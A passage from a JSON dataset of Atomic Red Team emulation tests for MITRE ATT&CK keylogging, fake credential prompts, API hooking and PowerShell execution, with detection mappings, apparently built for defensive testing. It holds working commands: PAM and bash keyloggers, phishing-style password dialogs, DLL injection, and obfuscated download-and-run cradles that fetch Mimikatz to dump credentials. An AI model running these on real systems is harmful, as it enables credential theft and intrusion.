"https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.group-ib.com/blog/cobalt", + "https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1056.001", + "command_list": [ + "Set-Location $PathToAtomicsFolder\n.\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath $env:TEMP\\key.log\n", + "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/system-auth", + "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> /tmp/.keyboard.log' DEBUG\necho \"Hello World!\"\ncat /tmp/.keyboard.log\n", + "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl restart auditd\nssh ubuntu@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", + "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n" + ], + "commands": [ + { + "command": "Set-Location $PathToAtomicsFolder\n.\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath $env:TEMP\\key.log\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/system-auth", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> /tmp/.keyboard.log' DEBUG\necho \"Hello World!\"\ncat /tmp/.keyboard.log\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl restart auditd\nssh ubuntu@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + }, + { + "command": "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n", + "source": "atomics/T1056.001/T1056.001.yaml", + "name": "Atomic Red Team Test - Input Capture: Keylogging" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1056.001", + "display_name": "Input Capture: Keylogging", + "atomic_tests": [ + { + "name": "Input Capture", + "auto_generated_guid": "d9b633ca-8efb-45e6-b838-70f595c6ae26", + "description": "Utilize PowerShell and external resource to capture keystrokes\n[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)\nProvided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)\n\nUpon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "filepath": { + "description": "Name of the local file, include path.", + "type": "Path", + "default": "$env:TEMP\\key.log" + } + }, + "executor": { + "command": "Set-Location $PathToAtomicsFolder\n.\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath #{filepath}\n", + "cleanup_command": "Remove-Item $env:TEMP\\key.log -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Living off the land Terminal Input Capture on Linux with pam.d", + "auto_generated_guid": "9c6bdb34-a89f-4b90-acb1-5970614c711b", + "description": "Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.\n\nPasswords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).\n\nUse 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. \n", + "dependencies": [ + { + "description": "Checking if pam_tty_audit.so is installed\n", + "prereq_command": "test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'\n", + "get_prereq_command": "echo \"Sorry, you must install module pam_tty_audit.so and recompile, for this test to work\"\n" + } + ], + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so enable=* log_password\" >> /etc/pam.d/system-auth", + "cleanup_command": "sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth\nsudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Logging bash history to syslog", + "auto_generated_guid": "0e59d59d-3265-4d35-bebd-bf5c1ec40db5", + "description": "There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable and can be configured to write the latest \"bash history\" entries to the syslog.\n\nTo gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires to be run in a bash shell and that logger and tee are installed.\n", + "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v logger)\" ]; then echo -e \"\\n***** logger NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v tee)\" ]; then echo -e \"\\n***** tee NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "cleanup_command": "unset PROMPT_COMMAND\n" + } + }, + { + "name": "Bash session based keylogger", + "auto_generated_guid": "7f85a946-a0ea-48aa-b6ac-8ff539278258", + "description": "When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. \n\nTo gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires to be run in a bash shell\n", + "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "input_arguments": { + "output_file": { + "name": "output_file", + "description": "File to store captured commands", + "type": "String", + "default": "/tmp/.keyboard.log" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> #{output_file}' DEBUG\necho \"Hello World!\"\ncat #{output_file}\n", + "cleanup_command": "rm #{output_file}\n" + } + }, + { + "name": "SSHD PAM keylogger", + "auto_generated_guid": "81d7d2ad-d644-4b6a-bea7-28ffe43becca", + "description": "Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires sshd and auditd\n", + "prereq_command": "if [ ! -x \"$(command -v sshd)\" ]; then echo -e \"\\n***** sshd NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v auditd)\" ]; then echo -e \"\\n***** auditd NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "input_arguments": { + "user_account": { + "description": "Basic ssh user account for testing.", + "type": "String", + "default": "ubuntu" + } + }, + "executor": { + "name": "sh", + "elevation_required": true, + "command": "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", + "cleanup_command": "cp -fv /tmp/sshd /etc/pam.d/\n" + } + }, + { + "name": "Auditd keylogger", + "auto_generated_guid": "a668edb9-334e-48eb-8c2e-5413a40867af", + "description": "The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires sshd and auditd\n", + "prereq_command": "if [ ! -x \"$(command -v auditd)\" ]; then echo -e \"\\n***** auditd NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n", + "cleanup_command": "systemctl restart auditd\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1056.002", + "command_list": [ + "osascript -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" & return & return default answer \"\" with icon 1 with hidden answer with title \"Software Update\"'\n", + "# Creates GUI to prompt for password. Expect long pause before prompt is available. \n$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning $cred.GetNetworkCredential().Password\n" + ], + "commands": [ + { + "command": "osascript -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" & return & return default answer \"\" with icon 1 with hidden answer with title \"Software Update\"'\n", + "source": "atomics/T1056.002/T1056.002.yaml", + "name": "Atomic Red Team Test - Input Capture: GUI Input Capture" + }, + { + "command": "# Creates GUI to prompt for password. Expect long pause before prompt is available. \n$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning $cred.GetNetworkCredential().Password\n", + "source": "atomics/T1056.002/T1056.002.yaml", + "name": "Atomic Red Team Test - Input Capture: GUI Input Capture" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1056.002", + "display_name": "Input Capture: GUI Input Capture", + "atomic_tests": [ + { + "name": "AppleScript - Prompt User for Password", + "auto_generated_guid": "76628574-0bc1-4646-8fe2-8f4427b47d15", + "description": "Prompt User for Password (Local Phishing)\nReference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "osascript -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to activate' -e 'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" & return & return default answer \"\" with icon 1 with hidden answer with title \"Software Update\"'\n", + "name": "bash" + } + }, + { + "name": "PowerShell - Prompt User for Password", + "auto_generated_guid": "2b162bfd-0928-4d4c-9ec3-4d9f88374b52", + "description": "Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.\n\nReference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "# Creates GUI to prompt for password. Expect long pause before prompt is available. \n$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning $cred.GetNetworkCredential().Password\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1056.004", + "command_list": [ + "mavinject $pid /INJECTRUNNING PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", + "mavinject $pid /INJECTRUNNING #{file_name}\nInvoke-WebRequest https://www.example.com -UseBasicParsing\n" + ], + "commands": [ + { + "command": "mavinject $pid /INJECTRUNNING PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", + "source": "atomics/T1056.004/T1056.004.yaml", + "name": "Atomic Red Team Test - Input Capture: Credential API Hooking" + }, + { + "command": "mavinject $pid /INJECTRUNNING #{file_name}\nInvoke-WebRequest https://www.example.com -UseBasicParsing\n", + "source": "atomics/T1056.004/T1056.004.yaml", + "name": "Atomic Red Team Test - Input Capture: Credential API Hooking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1056.004", + "display_name": "Input Capture: Credential API Hooking", + "atomic_tests": [ + { + "name": "Hook PowerShell TLS Encrypt/Decrypt Messages", + "auto_generated_guid": "de1934ea-1fbf-425b-8795-65fb27dd7e33", + "description": "Hooks functions in PowerShell to read TLS Communications\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "Dll To Inject", + "type": "Path", + "default": "PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll" + }, + "server_name": { + "description": "TLS Server To Test Get Request", + "type": "Url", + "default": "https://www.example.com" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1056.004x64.dll must exist on disk at specified location (#{file_name})\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll\" -OutFile \"#{file_name}\" -UseBasicParsing\n" + } + ], + "executor": { + "command": "mavinject $pid /INJECTRUNNING #{file_name}\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.001", + "command_list": [ + "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"\n", + "write-host \"Import and Execution of SharpHound.ps1 from PathToAtomicsFolder\\T1059.001\\src\" -ForegroundColor Cyan\nimport-module PathToAtomicsFolder\\T1059.001\\src\\SharpHound.ps1\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "write-host \"Remote download of SharpHound.ps1 into memory, followed by execution of the script\" -ForegroundColor Cyan\nIEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\n(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()\nSet-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))\n", + "$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr\n", + "Powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\\Windows\\System32\\cmd.exe'\"\n", + "powershell.exe -exec bypass -noprofile \"$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText\"\n", + "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -exec bypass -noprofile \"$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX\"\n", + "C:\\Windows\\system32\\cmd.exe /c \"mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()\"\n", + "# Encoded payload in next command is the following \"Set-Content -path \"$env:SystemRoot/Temp/art-marker.txt\" -value \"Hello from the Atomic Red Team\"\"\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Classes\\AtomicRedTeam\" /v ART /t REG_SZ /d \"U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"\niex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\AtomicRedTeam').ART)))\n", + "powershell.exe -version 2 -Command Write-Host $PSVersion\n", + "Add-Content -Path $env:TEMP\\NTFS_ADS.txt -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'\n$streamcommand = Get-Content -Path $env:TEMP\\NTFS_ADS.txt -Stream 'streamcommand'\nInvoke-Expression $streamcommand\n", + "New-PSSession -ComputerName $env:COMPUTERNAME\nTest-Connection $env:COMPUTERNAME\nSet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use -Value \"T1086 PowerShell Session Creation and Use\"\nGet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\nRemove-Item -Force $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\n", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType 